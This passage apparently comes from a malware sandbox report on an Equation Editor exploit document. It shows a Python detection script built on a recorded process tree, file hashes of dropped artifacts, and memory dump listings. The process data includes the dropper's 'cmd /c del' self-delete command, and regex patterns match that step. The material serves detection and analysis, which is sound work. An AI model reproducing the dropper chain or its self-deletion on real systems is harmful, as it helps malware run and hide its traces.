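              r'"C:\Users\Admin\AppData\Local\Temp\3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx"'),
    ProcEvent(2500, 1312, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(2636, 0, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(1824, 2636, r"C:\Users\Admin\AppData\Roaming\nelb82019.scr",
              r'"C:\Users\Admin\AppData\Roaming\nelb82019.scr"'),
    ProcEvent(272, 1824, r"C:\Users\Admin\AppData\Roaming\nelb82019.scr",
              r'"C:\Users\Admin\AppData\Roaming\nelb82019.scr"'),
    ProcEvent(2716, 1208, r"C:\Windows\SysWOW64\raserver.exe", r'"C:\Windows\SysWOW64\raserver.exe"'),
    ProcEvent(1076, 2716, r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\Admin\AppData\Roaming\nelb82019.scr"'),
]

# Executable formats dropped straight into the roaming profile.
USER_DROP = re.compile(r"\\appdata\\roaming\\[^\\]+\.(scr|exe|pif|com)$", re.I)
# "cmd /c del <something under AppData>": the dropper removing itself.
SELF_DELETE = re.compile(r'/c\s+del\s+"?[^"]*\\appdata\\', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, reason) pairs; a pid can appear more than once."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        name = basename(e.image)
        if pname == "eqnedt32.exe":
            hits.append((e.pid, "child process of Equation Editor"))
        if USER_DROP.search(e.image):
            hits.append((e.pid, "executable run from %APPDATA%\\Roaming"))
        if name == "cmd.exe" and SELF_DELETE.search(e.cmdline):
            hits.append((e.pid, "cmd /c del of a file under AppData (dropper self-delete)"))
        # Weaker indicator: explorer.exe starting a SysWOW64 binary with no arguments,
        # which is how the injected Explorer launched raserver.exe in this report.
        if (pname == "explorer.exe" and "\\syswow64\\" in e.image.lower()
                and e.cmdline.strip().strip('"').lower() == e.image.lower()):
            hits.append((e.pid, "argument-less SysWOW64 binary spawned by explorer.exe"))
    return hits


if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

On the report's tree the rules fire on pids 1824, 272, 1076 and 2716 and stay silent on Word, splwow64.exe and Explorer itself. The first three rules are specific enough to alert on; the fourth is better used to enrich the others than to alert alone, because explorer.exe legitimately starts system binaries all day.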
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
Of the files below, only nelb[1].doc (the file fetched into the IE cache, which the "Downloads MZ/PE file" signature identifies as an executable despite its .doc name) and nelb82019.scr (the dropped executable, later removed by cmd.exe) are attacker artifacts. The CryptnetUrlCache, OfficeFileCache, Cab*.tmp, Normal.dotm and UProof entries are ordinary Word and CryptoAPI activity.

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Filesize: 1KB
  MD5: d484f81016a0c21f2881004ac3b9a5b7
  SHA1: 182f4a8d74ff4682533d2a39fb44d3b9d5bc87c3
  SHA256: 82729f693790a30c02ee52ca1465bf2dfdc2ed44f49ce7e50e51c05f8838e434
  SHA512: 2782fe169244301d1d1436a5bc876a56a868ae2c520eebe9e3a65fd83f502980e1d3eb937c67a375e8110a0e2e9b196fc1f240c35a0197f5753e757ffdafb9d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
  Filesize: 724B
  MD5: 8202a1cd02e7d69597995cabbe881a12
  SHA1: 8858d9d934b7aa9330ee73de6c476acf19929ff6
  SHA256: 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
  SHA512: 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Filesize: 410B
  MD5: 95eedb0ec77299c11b55ab3b653ad2ad
  SHA1: 1491be29f0622bf413ac07d66711011e450d3a91
  SHA256: 4893861581e41142fdf73f81c59229beb4c3491df309de0cfbd05f6e5e054293
  SHA512: 550791b1dab48187fbec5faa1281393aa70b5ee701313488d0ec1cb5c66ae87f7184ca965eaa73b49a012cc1b2ecc802a6035bd9bb3eb1dfb74f8d1d2ed7e60a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: cc6a79a33e93d4f63a8622ed3c846c97
  SHA1: 79ae3f1ad4cad1b8bd38cafb9f194ca760aa6c87
  SHA256: 3810a937b402271bc9faf28b7142f11f518f58137ce7c1744e98c085033e0a41
  SHA512: 6aad50c69768f42594d3df573e145f461325e513a20bc00c64e44ce2a82b2787d6b3e00978a4a1769cf4318553f197d19b828e2b0df53361d30c8cd25b33f685

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
  Filesize: 392B
  MD5: b168d9f611307d1840b7993c7cb4ea6b
  SHA1: 528ee7db14b92af82d2a959326e72ede9303fe4a
  SHA256: b4d111181b6ff764f0538eaa94d52243d15e6f32a2d34b82ec3c782c91b96ae1
  SHA512: bb9e4edab45b073670e18b4b7ed16a625fbfff744d8d68946745fafbf9e3e5985e980351890d01610b4521256905232e8d25d643b6912f69640ee7aa0e6eddb6

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
  Filesize: 128KB
  MD5: 110a062d30bf55576de1fb6d9548ece0
  SHA1: 6f078364f247634c472262cbe53c55deb64bd31b
  SHA256: beec4b2b36227b81eb73e22c180e6d3073c240758760330ba354b38ddab08c66
  SHA512: 6d391adcda3a4453c78f5c1493fabf1c74fdf6c0f100af16e664c47338ad495c92deb23e0274d4a442587d1ec894f5dc65809076ff5f19fc62a4fabb83884882

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{EC91BB0E-CBC0-4BBF-9365-EC5CE618ADD4}.FSD
  Filesize: 128KB
  MD5: 30aebae81eb1a0d3710b91f449063976
  SHA1: 278af9d6708fd91313103300df4b6bc3935af3ba
  SHA256: 4b06efc07a1485338c2cb272376d8c836811c3e18cef2d068c660de026291ffe
  SHA512: ad32aa4b7c7c0926ada766b74fbddf76dba33b37bcde2184e46710635c4ec666da8cc3a71ec10961347c57069ad0cca90a87d28666e41789448dd001816475a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\nelb[1].doc
  Filesize: 561KB
  MD5: 6b9167056af49bf702c833ae4f581ef1
  SHA1: ed4886d86b8ad96a0a252190705d70e0fac9289b
  SHA256: 13bc94a2f39a03f509036ff58462b974c401cac0df52cce22223114f909b2f72
  SHA512: 4ba4fc52c2add76cb58cec62f9ae608108aa77374c63c4416f4e5c2ac0fc4bf3569f3520e1ac77994842789015c767d3bb2dd1d384221d5fa865ab54bfc51a07

C:\Users\Admin\AppData\Local\Temp\Cab1FD0.tmp
  Filesize: 68KB
  MD5: 29f65ba8e88c063813cc50a4ea544e93
  SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
  SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
  SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\{5BEA2DC5-E950-4861-8DEF-132085883B45}
  Filesize: 128KB
  MD5: a763b170dd1ce80f6516574c7e5ec59e
  SHA1: 3d86105b3618fac2bb6f350898e71cc12d553e5f
  SHA256: 5f71b59a7077f7a262fc22290e937d753f3eb32d2e52df0c1d2acc4f111354c2
  SHA512: 8ac2b4d0605375b0698359d6def3ba69f4fb0ff30169cb956a5d774ed2d971812f93488e5566dd75f4c6545a97980445211db221039d44e11355b9240718eb57

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
  Filesize: 20KB
  MD5: 2d3946735e9c4407280dae3f9240eb24
  SHA1: 0bc5819d4634e7ec0da3349a64b3101b5f0866b2
  SHA256: 073673e31db96d8f22224483b265c90ccd550208939c2020caee9f5a4aa9af57
  SHA512: 33691c07d96683bb5c243ae5cdc872c34ede3fa83aedaa0f246c5e7d2655e32eb704f8ab305a573198f2f4ee335fd6aa7b69f48264fbc4c4647fee6296ecadff

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
  Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

\Users\Admin\AppData\Roaming\nelb82019.scr
  Filesize: 577KB
  MD5: 13049d0aa3d789f8b8951726527b1713
  SHA1: 371c080cbf9425a1c8ad87050269e22e061c4f79
  SHA256: 0eb63b2464eb65ad5c2dad2881dadeb3c50da801b1b6846c07710dbd4cfb4c9a
  SHA512: a899b15f7f7466eee28459cc62e6a75b1294f760cda97cbd8b8b0c5affa2e4700a3c48d2a31c3a3a2c9deb26de411a255fd9d56d6f9d98f2b40bb4f6fa17c04e

Memory dumps
  memory/272-135-0x0000000000400000-0x000000000042F000-memory.dmp  (188KB)
  memory/272-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmp  (4KB)
  memory/272-130-0x0000000000400000-0x000000000042F000-memory.dmp  (188KB)
  memory/272-132-0x0000000000400000-0x000000000042F000-memory.dmp  (188KB)
  memory/1208-138-0x0000000000240000-0x0000000000340000-memory.dmp  (1024KB)
  memory/1208-156-0x0000000006210000-0x00000000062F5000-memory.dmp  (916KB)
  memory/1312-0-0x000000002F341000-0x000000002F342000-memory.dmp  (4KB)
  memory/1312-2-0x000000007180D000-0x0000000071818000-memory.dmp  (44KB)
  memory/1312-153-0x000000007180D000-0x0000000071818000-memory.dmp  (44KB)
  memory/1312-1-0x000000005FFF0000-0x0000000060000000-memory.dmp  (64KB)
  memory/1312-186-0x000000005FFF0000-0x0000000060000000-memory.dmp  (64KB)
  memory/1312-187-0x000000007180D000-0x0000000071818000-memory.dmp  (44KB)
  memory/1824-129-0x00000000002D0000-0x00000000002D8000-memory.dmp  (32KB)
  memory/1824-124-0x0000000000780000-0x00000000007E2000-memory.dmp  (392KB)
  memory/1824-123-0x00000000000B0000-0x0000000000146000-memory.dmp  (600KB)
  memory/2716-148-0x0000000000B20000-0x0000000000B3C000-memory.dmp  (112KB)
  memory/2716-149-0x0000000000080000-0x00000000000AF000-memory.dmp  (188KB)